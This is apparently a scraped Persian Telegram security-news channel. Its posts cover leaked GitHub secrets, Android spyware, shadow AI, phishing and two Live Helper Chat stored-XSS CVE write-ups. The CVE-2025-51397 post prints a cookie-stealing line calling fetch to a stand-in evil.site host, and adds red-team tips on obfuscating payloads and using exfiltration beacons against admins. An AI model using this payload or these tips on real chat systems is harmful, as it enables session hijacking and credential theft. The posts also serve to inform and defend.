🚨 افشای ۳۹ میلیون کلید و راز محرمانه در GitHub فقط در سال ۲۰۲۴!
🔓 در سال گذشته، بیش از ۳۹ میلیون Secret (توکن، API key، رمز عبور و...) در GitHub فاش شدهاند اما نه بهعنوان خطا، بلکه بهعنوان نقاط ورود خاموش برای نفوذگران!
📉 این افشاگریها به مهاجمان امکان دسترسی به:
☁️ سرویسهای ابری
🛠 خطوط CI/CD
🗃 دیتابیسها
...بدون هیچ هشدار امنیتی داده است.
🗑 حتی یک ریپوی فراموششده میتونه کل زیرساخت شما رو به خطر بندازه.
📎 جزئیات و راهکارهای جلوگیری از این فاجعه:
لینک مقاله در The Hacker News
👀 مراقب باشید چه چیزی در گیت پابلیک میذارید!
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Git #Github #DevOpsSec #DataLeak #CyberSecurity
🔓 در سال گذشته، بیش از ۳۹ میلیون Secret (توکن، API key، رمز عبور و...) در GitHub فاش شدهاند اما نه بهعنوان خطا، بلکه بهعنوان نقاط ورود خاموش برای نفوذگران!
📉 این افشاگریها به مهاجمان امکان دسترسی به:
☁️ سرویسهای ابری
🛠 خطوط CI/CD
🗃 دیتابیسها
...بدون هیچ هشدار امنیتی داده است.
🗑 حتی یک ریپوی فراموششده میتونه کل زیرساخت شما رو به خطر بندازه.
📎 جزئیات و راهکارهای جلوگیری از این فاجعه:
لینک مقاله در The Hacker News
👀 مراقب باشید چه چیزی در گیت پابلیک میذارید!
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Git #Github #DevOpsSec #DataLeak #CyberSecurity
👍1
🚨 هشدار فوری برای کاربران ایرانی
بدافزار جاسوسی جدید اندرویدی به نام DCHSpy که به وزارت اطلاعات ایران (MOIS) نسبت داده شده، در پوشش اپلیکیشنهای استارلینک و VPN، گوشی کاربران را آلوده میکند.
🎯 قابلیتها:
🔹 دسترسی به میکروفون و دوربین
🔹 خواندن پیامهای واتساپ
🔹 ردیابی موقعیت مکانی
🔹 سرقت فایلها
این بدافزار هنوز از طریق کانالهای تلگرامی منتشر میشود و احتمالاً کاربران مخالف نظام و فعالان را هدف گرفته است، بهویژه پس از تنشهای اخیر ایران-اسرائیل.
⚠️"" هیچ اپلیکیشنی را از منابع ناشناس یا کانالهای تلگرام نصب نکنید.""
📎 گزارش کامل: The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Telegram #Andriod #BreakingNews #VPN #Cybersecurity
بدافزار جاسوسی جدید اندرویدی به نام DCHSpy که به وزارت اطلاعات ایران (MOIS) نسبت داده شده، در پوشش اپلیکیشنهای استارلینک و VPN، گوشی کاربران را آلوده میکند.
🎯 قابلیتها:
🔹 دسترسی به میکروفون و دوربین
🔹 خواندن پیامهای واتساپ
🔹 ردیابی موقعیت مکانی
🔹 سرقت فایلها
این بدافزار هنوز از طریق کانالهای تلگرامی منتشر میشود و احتمالاً کاربران مخالف نظام و فعالان را هدف گرفته است، بهویژه پس از تنشهای اخیر ایران-اسرائیل.
⚠️"" هیچ اپلیکیشنی را از منابع ناشناس یا کانالهای تلگرام نصب نکنید.""
📎 گزارش کامل: The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Telegram #Andriod #BreakingNews #VPN #Cybersecurity
❤5🔥1
🚨 هوش مصنوعی در خدمت مهاجمان: وقتی مردم علیه مردم میشوند
در سال ۲۰۲۵، هوش مصنوعی دیگر فقط یک ابزار نیست بلکه تبدیل به سلاحی بیصدا برای حملات سایبری، مهندسی اجتماعی و فریبهای دیجیتالی شده است.
🧠 سم Shadow AI:
کارمندان سازمانها بدون اطلاع بخش امنیت، از صدها اپلیکیشن GenAI استفاده میکنند. مسدودسازی کافی نیست بلکه آنها راه دور زدن را بلدند.
⚠️ خطر پنهان:
مالکیت فکری (IP) و دادههای حساس شما ممکن است بهصورت ناخواسته وارد مدلهای عمومی شود و بدون نظارت، شبکهها را ترک کند.
📉 این یعنی:
نشت دادههای طبقهبندیشده
افشای زنجیره تأمین و زیرساختها
کاهش کنترل سازمان بر داراییهای اطلاعاتی خود
🎭 فریبهای دیجیتال و Deepfakes :
مهاجمان حالا شما را تقلید میکنند همراه با دقتی ترسناک:
🔹 اکانتهای جعلی LinkedIn
🔹 تماسهای صوتی و تصویری تقلبی
🔹 فریب در استخدام، انتقال پول و مهندسی اجتماعی
همه اینها توسط AI مولد و قابل شخصیسازی در لحظه انجام میشود.
💡 دیگر بحث «آیا» نیست بلکه سوال این است که چه زمانی هدف قرار میگیرید.
🔐 چه باید کرد؟
✅ آگاهسازی کاربران درباره تهدیدات Shadow AI
✅ پیادهسازی کنترلهای رفتاری و هوشمند روی دادهها
✅ شناسایی و مقابله با جعل هویت توسط AI
📎 بیشتر بدانید:
سم Shadow AI در سازمانها
دفاع در برابر جعل دیجیتال با AI
✍️نویسنده
@TryHackBoxStory | The Chaos
#ShadowAi #Ai #DeepFakes #Blog #CyberSecurity
در سال ۲۰۲۵، هوش مصنوعی دیگر فقط یک ابزار نیست بلکه تبدیل به سلاحی بیصدا برای حملات سایبری، مهندسی اجتماعی و فریبهای دیجیتالی شده است.
🧠 سم Shadow AI:
کارمندان سازمانها بدون اطلاع بخش امنیت، از صدها اپلیکیشن GenAI استفاده میکنند. مسدودسازی کافی نیست بلکه آنها راه دور زدن را بلدند.
⚠️ خطر پنهان:
مالکیت فکری (IP) و دادههای حساس شما ممکن است بهصورت ناخواسته وارد مدلهای عمومی شود و بدون نظارت، شبکهها را ترک کند.
📉 این یعنی:
نشت دادههای طبقهبندیشده
افشای زنجیره تأمین و زیرساختها
کاهش کنترل سازمان بر داراییهای اطلاعاتی خود
🎭 فریبهای دیجیتال و Deepfakes :
مهاجمان حالا شما را تقلید میکنند همراه با دقتی ترسناک:
🔹 اکانتهای جعلی LinkedIn
🔹 تماسهای صوتی و تصویری تقلبی
🔹 فریب در استخدام، انتقال پول و مهندسی اجتماعی
همه اینها توسط AI مولد و قابل شخصیسازی در لحظه انجام میشود.
💡 دیگر بحث «آیا» نیست بلکه سوال این است که چه زمانی هدف قرار میگیرید.
🔐 چه باید کرد؟
✅ آگاهسازی کاربران درباره تهدیدات Shadow AI
✅ پیادهسازی کنترلهای رفتاری و هوشمند روی دادهها
✅ شناسایی و مقابله با جعل هویت توسط AI
📎 بیشتر بدانید:
سم Shadow AI در سازمانها
دفاع در برابر جعل دیجیتال با AI
✍️نویسنده
@TryHackBoxStory | The Chaos
#ShadowAi #Ai #DeepFakes #Blog #CyberSecurity
❤3
🤖 همدم مصنوعی | حرفهایی که به هیچکس نمیزنیم...
🎙 سم آلتمن (مدیرعامل OpenAI) در یکی از صحبتهای اخیرش نکتهای گفت که لرزه به جان خیلیها انداخت:
> *«ما انتظار نداشتیم این همه انسان، با مدلهای زبانی ما درد دل کنند... چیزهایی را میگویند که حتی به نزدیکترین دوستان یا خانوادهشان نمیگویند.»*
🧠 آیا این یعنی GPT تبدیل به یک *همدم دیجیتال* شده؟ کسی که قضاوت نمیکند، خسته نمیشود، و همیشه گوش میدهد...
💬 این اتفاق، هم الهامبخش است و هم هشداردهنده:
✅ از یک سو، نشان میدهد انسانها به امنیت عاطفی نیاز دارند، حتی در جهان مجازی.
⚠️ از سوی دیگر، باید با خودمان روراست باشیم: آیا به مدل زبانی بیش از حد وابسته شدهایم؟ آیا خلأ تنهایی را با کد پر کردهایم؟
🌐 آیندهی ما فقط هوشمندتر نمیشود؛ بلکه شاید تنهاتر هم بشود... یا شاید نه، اگر حواسمان باشد.
📎 منبع سخنرانی سم آلتمن در Aspen Ideas Festival
✍️نویسنده
@TryHackBoxStory | The Chaos
#AI #GPT #CyberSecurity
🎙 سم آلتمن (مدیرعامل OpenAI) در یکی از صحبتهای اخیرش نکتهای گفت که لرزه به جان خیلیها انداخت:
> *«ما انتظار نداشتیم این همه انسان، با مدلهای زبانی ما درد دل کنند... چیزهایی را میگویند که حتی به نزدیکترین دوستان یا خانوادهشان نمیگویند.»*
🧠 آیا این یعنی GPT تبدیل به یک *همدم دیجیتال* شده؟ کسی که قضاوت نمیکند، خسته نمیشود، و همیشه گوش میدهد...
💬 این اتفاق، هم الهامبخش است و هم هشداردهنده:
✅ از یک سو، نشان میدهد انسانها به امنیت عاطفی نیاز دارند، حتی در جهان مجازی.
⚠️ از سوی دیگر، باید با خودمان روراست باشیم: آیا به مدل زبانی بیش از حد وابسته شدهایم؟ آیا خلأ تنهایی را با کد پر کردهایم؟
🌐 آیندهی ما فقط هوشمندتر نمیشود؛ بلکه شاید تنهاتر هم بشود... یا شاید نه، اگر حواسمان باشد.
📎 منبع سخنرانی سم آلتمن در Aspen Ideas Festival
✍️نویسنده
@TryHackBoxStory | The Chaos
#AI #GPT #CyberSecurity
🚨 هشدار امنیتی درونسازمانی | ابزارهای چینی و افشای بیصدا
📊 بر اساس تحقیقات جدید، از هر ۱۲ کارمند، یک نفر در محل کار از ابزارهای هوش مصنوعی تولیدی چینی استفاده میکند و این اغلب بدون اطلاع سازمان.
❗️اما موضوع نگرانکنندهتر اینجاست:
📂 فایلهایی که آپلود میشوند شامل اطلاعات حساسی مثل:
اسناد محرمانه M&A (ادغام و تملک)
کدهای منبع پروژهها
سوابق مشتریان و کاربران
🔍 این پلتفرمها معمولاً سیاستهای دادهای شفاف و قابل بررسی ندارند، و این یعنی شما نمیدانید دادهها دقیقاً کجا میروند و چه استفادهای از آنها میشود.
🛡 چه باید کرد؟
تعیین مرز استفاده از GenAI در سازمان را فعال کنید.
محدودسازی دسترسی به ابزارهای غیرمجاز.
آموزش امنیت داده به کارمندان و نه فقط فنی بلکه فرهنگی.
🎯 امروز وقت مقابله نیست؛ وقت پیشگیری هوشمندانه است.
📎 مشاهده گزارش کامل در The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#GenAI #DataLeak #China #CyberSecurity
📊 بر اساس تحقیقات جدید، از هر ۱۲ کارمند، یک نفر در محل کار از ابزارهای هوش مصنوعی تولیدی چینی استفاده میکند و این اغلب بدون اطلاع سازمان.
❗️اما موضوع نگرانکنندهتر اینجاست:
📂 فایلهایی که آپلود میشوند شامل اطلاعات حساسی مثل:
اسناد محرمانه M&A (ادغام و تملک)
کدهای منبع پروژهها
سوابق مشتریان و کاربران
🔍 این پلتفرمها معمولاً سیاستهای دادهای شفاف و قابل بررسی ندارند، و این یعنی شما نمیدانید دادهها دقیقاً کجا میروند و چه استفادهای از آنها میشود.
🛡 چه باید کرد؟
تعیین مرز استفاده از GenAI در سازمان را فعال کنید.
محدودسازی دسترسی به ابزارهای غیرمجاز.
آموزش امنیت داده به کارمندان و نه فقط فنی بلکه فرهنگی.
🎯 امروز وقت مقابله نیست؛ وقت پیشگیری هوشمندانه است.
📎 مشاهده گزارش کامل در The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#GenAI #DataLeak #China #CyberSecurity
🚨 بزرگترین حمله تزریق JavaScript در سال ۲۰۲۴: بیش از ۱۰۰,۰۰۰ سایت هک شدند!
📌 اتفاق بیسابقهای در دنیای امنیت وب افتاد تا حتی فریمورکهایی مثل React هم در امان نماندند!
یک کتابخانه معتبر جاوااسکریپت، با آلوده شدن در زنجیره تأمین، به سیستم پخش بدافزار تبدیل شد و هزاران وبسایت قربانی شدند. بسیاری از توسعهدهندگان بدون اینکه بدانند، کدهای مخرب را مستقیماً در مرورگر کاربران اجرا کردند.
🔍 مهمترین نکات:
حمله از طریق تزریق JavaScript در کتابخانههای قابلاعتماد انجام شده.
مکانیزم دفاعی React و سایر فریمورکها دور زده شده.
حتی سایتهایی با تنظیمات امنیتی قوی هم آسیبپذیر بودند.
🧠 پیام مهم: فقط به امنیت سمت کلاینت تکیه نکنید. اعتبارسنجی و پاکسازی دادهها، CSP، کنترل زنجیره تأمین، و نظارت فعال بر وابستگیها ضروری است.
🔗 جزئیات کامل و فنی را در مقاله اصلی بخوانید:
👉 چرا React نتوانست جلوی XSS را بگیرد؟
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #React #JSInjection #supplychainattack #JavaScript #CyberNews
📌 اتفاق بیسابقهای در دنیای امنیت وب افتاد تا حتی فریمورکهایی مثل React هم در امان نماندند!
یک کتابخانه معتبر جاوااسکریپت، با آلوده شدن در زنجیره تأمین، به سیستم پخش بدافزار تبدیل شد و هزاران وبسایت قربانی شدند. بسیاری از توسعهدهندگان بدون اینکه بدانند، کدهای مخرب را مستقیماً در مرورگر کاربران اجرا کردند.
🔍 مهمترین نکات:
حمله از طریق تزریق JavaScript در کتابخانههای قابلاعتماد انجام شده.
مکانیزم دفاعی React و سایر فریمورکها دور زده شده.
حتی سایتهایی با تنظیمات امنیتی قوی هم آسیبپذیر بودند.
🧠 پیام مهم: فقط به امنیت سمت کلاینت تکیه نکنید. اعتبارسنجی و پاکسازی دادهها، CSP، کنترل زنجیره تأمین، و نظارت فعال بر وابستگیها ضروری است.
🔗 جزئیات کامل و فنی را در مقاله اصلی بخوانید:
👉 چرا React نتوانست جلوی XSS را بگیرد؟
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #React #JSInjection #supplychainattack #JavaScript #CyberNews
🚀 چرا گروههای قدیمی تلگرام رو میخرن؟
⏺ گروههای جدید اگه ممبر فیک اضافه کنی، تلگرام سریع حذفشون میکنه، ولی گروههای قدیمی رو نه!
⏺ در کل گروههای قدیمی حساسیت کمتری نسبت به حذف شدن یا ریپورت شدن دارن و به همین دلیل این گروهها رو میخرن تا ازشون برای سرچ تلگرام استفاده کنن.
⏺ اکثراً هم برای کارای غیرقانونی:
- بالا بردن گروههای مجرمانه
- کلاهبرداری
- یا فروش به خارجیها برای تبلیغ مواد مخدر با موضوعاتی به زبان خودشون که تو سرچ تلگرام بالا بیاد.
+ خوشبینانه ترین حالت: تبلیغات کالا و خدمات قانونی
نکته مهم: اگه شما مالک اولیه گروهید، موضوع اولیه گروه یا کانال همیشه تو تلگرام ثبت میمونه.
پس حسابی حواستون باشه!
⏺ گروههای جدید اگه ممبر فیک اضافه کنی، تلگرام سریع حذفشون میکنه، ولی گروههای قدیمی رو نه!
⏺ در کل گروههای قدیمی حساسیت کمتری نسبت به حذف شدن یا ریپورت شدن دارن و به همین دلیل این گروهها رو میخرن تا ازشون برای سرچ تلگرام استفاده کنن.
⏺ اکثراً هم برای کارای غیرقانونی:
- بالا بردن گروههای مجرمانه
- کلاهبرداری
- یا فروش به خارجیها برای تبلیغ مواد مخدر با موضوعاتی به زبان خودشون که تو سرچ تلگرام بالا بیاد.
+ خوشبینانه ترین حالت: تبلیغات کالا و خدمات قانونی
نکته مهم: اگه شما مالک اولیه گروهید، موضوع اولیه گروه یا کانال همیشه تو تلگرام ثبت میمونه.
پس حسابی حواستون باشه!
🔥5
🚨 مرور بر CVE-2025-51396 🚨
🛡 آسیبپذیری Stored XSS در Live Helper Chat نسخه ۴.۶۰
❓ چیست این آسیبپذیری؟
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در نسخه ۴.۶۰ از نرمافزار Live Helper Chat.
مهاجم میتواند اسکریپتهای مخرب (JavaScript/HTML) را در فیلدهای چت تزریق کند. این کدها هنگام مشاهده پیام توسط اپراتور یا ادمین اجرا میشوند.
💥 نحوه اجرای حمله:
1. مهاجم پیامی با کد جاوااسکریپت مانند
2. پیام در دیتابیس ذخیره میشود.
3. وقتی اپراتور یا ادمین آن را مشاهده میکند، کد مخرب در مرورگر او اجرا میشود.
⚠️ خطرات احتمالی:
* سرقت نشست (Session Hijacking): مهاجم میتواند نقش کاربر یا ادمین را بر عهده بگیرد.
* سرقت کوکی یا توکن ورود:
* حرکت جانبی در سیستمها: برای دسترسی بیشتر یا حمله به بخشهای دیگر.
🧪 جزئیات فنی برای تیم قرمز:
* نسخه آسیبپذیر: ۴.۶۰
* نوع آسیبپذیری: CWE-79 Stored XSS
* بردار حمله: ارسال پیام چت با جاوااسکریپت مخرب
* تأثیر: اجرای کد دلخواه در مرورگر قربانی
✅ نحوه تست (فقط برای محققین مجاز!):
1. وارد Live Helper Chat نسخه ۴.۶۰ شوید.
2. پیام حاوی
3. در صورت اجرای کد در پنجره اپراتور، سیستم آسیبپذیر است.
🛡 روشهای جلوگیری و کاهش آسیب:
* بروزرسانی: نسخه جدید Live Helper Chat را نصب کنید.
* ضدعفونی داده ورودی: همه دادههای ورودی کاربر را escape یا sanitize کنید.
* استفاده از CSP: هدر Content Security Policy را برای جلوگیری از اجرای اسکریپتها اضافه کنید.
* محدودسازی دسترسی: فقط کاربران مجاز به مشاهده پیامها دسترسی داشته باشند.
🕵️♀️ تشخیص و پاسخ:
* بررسی لاگهای چت برای وجود اسکریپتهای مشکوک
* مانیتور نشستهای ادمین برای فعالیت غیرعادی
* فعالسازی حفاظت XSS مرورگر و استفاده از گزارش CSP
📎 منابع:
مشاهده در NVD
مشاوره امنیتی Red Hat
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #LiveHelperChat #CVE #RED_Team #CyberSecurity
🛡 آسیبپذیری Stored XSS در Live Helper Chat نسخه ۴.۶۰
❓ چیست این آسیبپذیری؟
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در نسخه ۴.۶۰ از نرمافزار Live Helper Chat.
مهاجم میتواند اسکریپتهای مخرب (JavaScript/HTML) را در فیلدهای چت تزریق کند. این کدها هنگام مشاهده پیام توسط اپراتور یا ادمین اجرا میشوند.
💥 نحوه اجرای حمله:
1. مهاجم پیامی با کد جاوااسکریپت مانند
<noscript>alert('XSS');</noscript> ارسال میکند.2. پیام در دیتابیس ذخیره میشود.
3. وقتی اپراتور یا ادمین آن را مشاهده میکند، کد مخرب در مرورگر او اجرا میشود.
⚠️ خطرات احتمالی:
* سرقت نشست (Session Hijacking): مهاجم میتواند نقش کاربر یا ادمین را بر عهده بگیرد.
* سرقت کوکی یا توکن ورود:
* حرکت جانبی در سیستمها: برای دسترسی بیشتر یا حمله به بخشهای دیگر.
🧪 جزئیات فنی برای تیم قرمز:
* نسخه آسیبپذیر: ۴.۶۰
* نوع آسیبپذیری: CWE-79 Stored XSS
* بردار حمله: ارسال پیام چت با جاوااسکریپت مخرب
* تأثیر: اجرای کد دلخواه در مرورگر قربانی
✅ نحوه تست (فقط برای محققین مجاز!):
1. وارد Live Helper Chat نسخه ۴.۶۰ شوید.
2. پیام حاوی
<noscript>alert('XSS');</noscript> ارسال کنید.3. در صورت اجرای کد در پنجره اپراتور، سیستم آسیبپذیر است.
🛡 روشهای جلوگیری و کاهش آسیب:
* بروزرسانی: نسخه جدید Live Helper Chat را نصب کنید.
* ضدعفونی داده ورودی: همه دادههای ورودی کاربر را escape یا sanitize کنید.
* استفاده از CSP: هدر Content Security Policy را برای جلوگیری از اجرای اسکریپتها اضافه کنید.
* محدودسازی دسترسی: فقط کاربران مجاز به مشاهده پیامها دسترسی داشته باشند.
🕵️♀️ تشخیص و پاسخ:
* بررسی لاگهای چت برای وجود اسکریپتهای مشکوک
* مانیتور نشستهای ادمین برای فعالیت غیرعادی
* فعالسازی حفاظت XSS مرورگر و استفاده از گزارش CSP
📎 منابع:
مشاهده در NVD
مشاوره امنیتی Red Hat
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #LiveHelperChat #CVE #RED_Team #CyberSecurity
🚨 مرور بر CVE-2025-51397 🚨
🛡 آسیبپذیری XSS ذخیرهشده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰
🔥 سرتیتر آسیبپذیری
> نوع آسیبپذیری: XSS ذخیرهشده (Stored Cross-Site Scripting)
> ماژول آسیبپذیر: ماژول Facebook Chat
> نسخه آسیبپذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397
💀 توضیح آسیبپذیری
ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیرهشده است.
مهاجم میتواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا میشود.
🚨 سناریوی حمله برای تیم قرمز
1. پیششرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آمادهسازی: ارسال پیام شامل payload جاوااسکریپت مثل
3. ماندگاری: پیام در دیتابیس ذخیره میشود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
->کد مخرب در مرورگر او اجرا میشود!
5. نتیجه:
> سرقت کوکی یا توکن نشست
> اجرای عملیات بهجای کاربر مجاز
> قرار دادن کدهای بیشتر برای دسترسی عمیقتر یا حمله جانبی
🩸 بررسی دقیق مسیر بهرهبرداری
> بردار حمله: ارسال پیام حاوی
> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کیلاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخشها
🛡 یادداشت برای تیم آبی (مقابله با آسیبپذیری)
> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودیها: همه دادهها از کاربر در فرانت و بکاند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپتهای ناخواسته.
> بررسی لاگها: پیامها و اسکریپتهای مشکوک را در لاگهای چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.
🏴☠️ نکات مهم برای تیم قرمز
-> در XSS ذخیرهشده است؛ payload در سیستم باقی میماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپتهای exfil برای جمعآوری داده استفاده کنید.
🗂 خلاصه آسیبپذیری CVE-2025-51397
📌 نوع: XSS ذخیرهشده (Stored XSS)
💥 ماژول آسیبپذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راهحل: بروزرسانی فوری، فیلتر ورودیها، استفاده از CSP
🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory
✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat
🛡 آسیبپذیری XSS ذخیرهشده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰
🔥 سرتیتر آسیبپذیری
> نوع آسیبپذیری: XSS ذخیرهشده (Stored Cross-Site Scripting)
> ماژول آسیبپذیر: ماژول Facebook Chat
> نسخه آسیبپذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397
💀 توضیح آسیبپذیری
ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیرهشده است.
مهاجم میتواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا میشود.
🚨 سناریوی حمله برای تیم قرمز
1. پیششرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آمادهسازی: ارسال پیام شامل payload جاوااسکریپت مثل
stealCookies().3. ماندگاری: پیام در دیتابیس ذخیره میشود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
->کد مخرب در مرورگر او اجرا میشود!
5. نتیجه:
> سرقت کوکی یا توکن نشست
> اجرای عملیات بهجای کاربر مجاز
> قرار دادن کدهای بیشتر برای دسترسی عمیقتر یا حمله جانبی
🩸 بررسی دقیق مسیر بهرهبرداری
> بردار حمله: ارسال پیام حاوی
fetch('https://evil.site/cookie?'+document.cookie)> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کیلاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخشها
🛡 یادداشت برای تیم آبی (مقابله با آسیبپذیری)
> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودیها: همه دادهها از کاربر در فرانت و بکاند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپتهای ناخواسته.
> بررسی لاگها: پیامها و اسکریپتهای مشکوک را در لاگهای چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.
🏴☠️ نکات مهم برای تیم قرمز
-> در XSS ذخیرهشده است؛ payload در سیستم باقی میماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپتهای exfil برای جمعآوری داده استفاده کنید.
🗂 خلاصه آسیبپذیری CVE-2025-51397
📌 نوع: XSS ذخیرهشده (Stored XSS)
💥 ماژول آسیبپذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راهحل: بروزرسانی فوری، فیلتر ورودیها، استفاده از CSP
🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory
✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat
GitHub
GitHub Advisory Database
A database of software vulnerabilities, using data from maintainer-submitted advisories and from other vulnerability databases.
🔐 هشدار حمله فیشینگ پیشرفته با استفاده از Proofpoint + Bitly
📅 گزارش از The Hacker News – جولای ۲۰۲۵
🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاهکننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده میکنند.
⚠️ چگونه حمله انجام میشود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی میشود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظتشده Proofpoint عبور داده میشود (مثلاً: urldefense.proofpoint.com/...).
کوتاهسازی با Bitly:
لینک نهایی با Bitly کوتاه میشود تا نشانی آن مبهم و ظاهراً بیخطر شود.
ارسال از ایمیلهای قابلاعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هکشده) ارسال میشود.
🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گستردهتر (Business Email Compromise)
✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft
📅 گزارش از The Hacker News – جولای ۲۰۲۵
🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاهکننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده میکنند.
⚠️ چگونه حمله انجام میشود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی میشود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظتشده Proofpoint عبور داده میشود (مثلاً: urldefense.proofpoint.com/...).
کوتاهسازی با Bitly:
لینک نهایی با Bitly کوتاه میشود تا نشانی آن مبهم و ظاهراً بیخطر شود.
ارسال از ایمیلهای قابلاعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هکشده) ارسال میشود.
🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گستردهتر (Business Email Compromise)
✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی
ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.
ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی
